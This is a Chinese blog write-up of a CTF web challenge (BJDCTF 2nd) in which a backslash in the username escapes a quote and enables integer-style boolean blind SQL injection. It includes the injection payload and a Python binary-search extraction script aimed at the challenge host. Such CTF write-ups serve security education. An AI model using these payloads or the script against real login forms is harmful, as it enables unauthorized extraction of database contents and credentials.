[BJDCTF 2nd]简单注入---关于整数型注入的一些理解

最新推荐文章于 2024-07-29 16:48:37 发布
最新推荐文章于 2024-07-29 16:48:37 发布
阅读量346 收藏
点赞数 1
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/StevenOnesir/article/details/111697089
版权

本次以BJDCTF的题目,简单对整数型注入做一些讲解。

其实也是布尔盲注,但题目难度较低

首先进入界面:

在这里插入图片描述
看到的是比较友善的登录界面,考虑题目名称为简单注入,我们直接在密码栏输入 ',发现被过滤。

在这里插入图片描述
因此开始考虑整数型注入。

既然闭合了引号防止闭合,这里我们可以猜测后端代码,结合用户名输入进行注入。

在用户名中输入\,可以过滤掉用户名处的最后一个',这是password='这部分的第一个引号将会作为前面字符段的闭合,就可以构造整数型注入。

我们构建第一个payload:

username=a\
password=or length(database())>0#

发现回显改变:

在这里插入图片描述
说明我们的思路整体是正确的。

那么接下来就是写脚本爆了:

import requests
import time
url='http://e33486cf-7016-47df-b067-1515c685ffe5.node3.buuoj.cn/'

inf=''

for i in range(1,2000):
    low=32
    high=128
    mid=(low+high)>>1
    while low<high:
        time.sleep(0.1)
        data={
            'username':'aa\\',
            'password':''
        }
        # data['password']='or ascii(substr(database(),{},1))>{}#'.format(i,mid)
        # data['password'] = 'or ascii(substr((username),{},1))>{}#'.format(i, mid)
        # data['password'] = 'or ascii(substr((password),{},1))>{}#'.format(i, mid)
        re=requests.post(url=url,data=data)
        if 'stronger' in re.text:
            low=mid+1
        else:
            high=mid
        mid=(high+low)>>1
    if low==32 or high==128:
        break
    inf += chr(mid)
    print(inf)

脚本是相当简单的二分,至于import time的意义读者可以自行考虑。。。

其实这里select之类的是被过滤了的,但username与password居然没被过滤。。

姑且认为这是一道CTF题目吧。。

最后得到的回显中,username=admin,password=OhyOuFOuNdit

登录得到flag:
在这里插入图片描述

考察知识点:

双注,简单盲注,简单布尔注入

难度:

简单

总结:

咕咕了好久,后面该思考*CTF出题的最后步骤了。。。

StevenOnesir
关注
专栏目录
BJDCTF 2nd总结
rreally的博客
03-26 1416
crypto 签到-y1ng 这道题基本上是最常见的体系base64直接解得BJD{W3lc0me_T0_BJDCTF} 老文盲了 这题挺奇葩的,打开发现内容为“罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛驕鳓哵眔鞹鰝”前三个首写为BJD,后面读出来是“大括号这就是flag直接交了吧大括号”,所以提交BJD{淛匶襫黼瀬鎶軄鶛驕鳓哵}。 cat_flag 这题出的属于知识盲区,完全没有头绪,直到看讲解时得知可以“喵...
[BJDCTF 2nd]简单注入 -wp
freerats的博客
07-17 541
拿到题目,先扫一下目录 发现有robots.txt,里面提示了一个hint.txt。 select * from users where username='$_POST["username"]' and password='$_POST["password"]'; 有一条后台查询语句 回到登入框处,尝试注入,发现加单双引号都被过滤 fuzz一下 长度为1414的都被过滤,包括select,and,=,等。 很明显联合注入用不了,报错注入无回显也不行。考虑盲注。 当username=admin&a.
[BJDCTF 2nd]简单注入
m0_53314778的博客
02-09 186
[BJDCTF 2nd]简单注入 考点:盲注 启动:拿到题目,先扫一下目录 发现有robots.txt,里面提示了一个hint.txt。访问hint.txt 有一条后台查询语句:select * from users where username='$_POST["username"]' and password='$_POST["password"]'; 应该有注入点 回到登入框处,尝试注入,发现加单双引号都被过滤fuzz一下 长度为1414的都被过滤,包括select,and,=,等。 很明显联合注入
整数型SQL注入
最新发布
qq_69100706的博客
07-29 200
在CTF(Capture The Flag)竞赛中,整数型SQL注入是一种常见的挑战类型,尤其是在Web安全类的任务中。整数型注入发生在应用程序接受数字输入时,没有正确地验证或清理输入数据,导致恶意构造的数字可以被解释为SQL语句的一部分,从而执行额外的数据库查询。
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
[BJDCTF 2nd]简单注入 详细wp
weixin_45887311的博客
07-28 662
又开始刷SQL注入的题目,从这道简单注入下手 首先没找到提示。。。。。。最后看了一下wp才发现有个hint.txt 有后端语句比较好构造了,结果又过滤,要fuzz探测一下 发现select还有 ' "都被过滤了 幸好空格和反斜杠没有被过滤。。。。 fuzz.txt (可以自己添加) select from ascii substr table column by schema where extractvalue exp if / ( ) % ! @ # $ ^ &...
[BJDCTF 2nd]文件探测
feng的博客
12-19 480
知识点 HTTP响应头 文件包含 代码审计 SSRF sprintf格式化漏洞 session绕过 WP 一道综合性很强的题目,真的很有意思,自己做的时候状态太差连文件包含都没弄出来,实在是太菜了,还是要加油。不过这题真的可以学到很多知识,very nice。 首先进入环境,f12拉到最下面可以看到提示: 看了一下,BJDCTF的传统header里藏东西,看一下header,发现了hint: 除此之外,尝试一下robots.txt: 可以发现admin.php,flag.php是不存在的。 进入h
BJDCTF 2nd secret
seaaseesa的博客
04-09 649
BJDCTF 2nd secret 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 是一个猜数游戏,数值全在代码里,但是有10000个,显然全部抠出来太慢了。 我们再看一下其他函数,发现输入name时,存在缓冲区溢出,可以改写0x000000000046D090处的指针,而该处指针指向count变量,每猜一下,就会对count减1。 然后,我们注意到printf...
BJDCTF2nd
Amherstieae的博客
05-25 1121
本文写于3.24,只是那个时候还莫得博客,遂现在才发出。 写在前面 大家好呀,这里是β-AS,是一枚真的小菜鸡,希望路过的师傅带带我鸭 这是第二届BJDCTF,作为真弟弟只对crypto和misc感兴趣呀,然后接着是关于这两方面这次比赛我们做出来的题的writeup,希望能对大家有所帮助,也希望路过的大佬带带我(这是关键) 哦对了,七校联盟萌新赛????嗯?????? 出题人出来!线下1V1来不来!! (假的,我打不过你) CRYPTO 。1签到-y1ng QkpEe1czbGMwbWVfVDBfQkpEQ
BJDCTF 2nd pwn Writeup
starssgo的博客
03-23 3148
博客地址 没做完…没出的题复现了补上去… r2t3 整数溢出,还是比较简单的 # -*- coding: utf-8 -* from pwn import * from LibcSearcher import * context.log_level = 'debug' context.arch = 'amd64' elf = ELF('r2t3') p = 0 def pwn(ip,port,de...
[BJDCTF 2nd]简单注入(过滤了引号,利用\逃逸sql语句第二字段)
qq_45521281的博客
04-28 1329
进入后页面: 看看后台用什么闭合的,测试单引号: 发现直接就给你过滤了。试试还过滤了什么,发现过滤了以下指令: (这个方法挺巧的) union , select , = , ' , & , && , - , " , and 连引号都过滤了,这可怎么做啊。 看看又什么提示,源码里面啥也没有,扫描一下发现robots.txt: 发现了hint.txt提示,访问看看: ...
[BJDCTF 2nd]简单注入【Bool+Regexp注入
D.MIND 的博客
04-28 457
这道题跟之前做的 [NCTF2019]SQLi 十分相像,不过之前写的盲注脚本不大好,没有区分大小写 文章目录Regexp注入布尔盲注脚本 首先fuzz一下,主要过滤了union、select 、单引号、双引号、if、=、like 但是值得庆幸空格、or、注释符 没被过滤(虽然过滤了也能绕) 本题有个hint可以通过robots.txt发现 Only u input the correct password then u can get the flag and p3rh4ps wants a girl f
全面理解LTE与eLTE-Advanced:技术详解与实战教程
"LTE - The UMTS Long Term Evolution (2nd Edition) 是一本权威而详尽的教程,全面介绍了长期演进(LTE)系统,特别是最新升级的LTE-Advanced技术。该书不仅深入解析了理论上的突破,还涵盖了确保这种革命性无线接入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值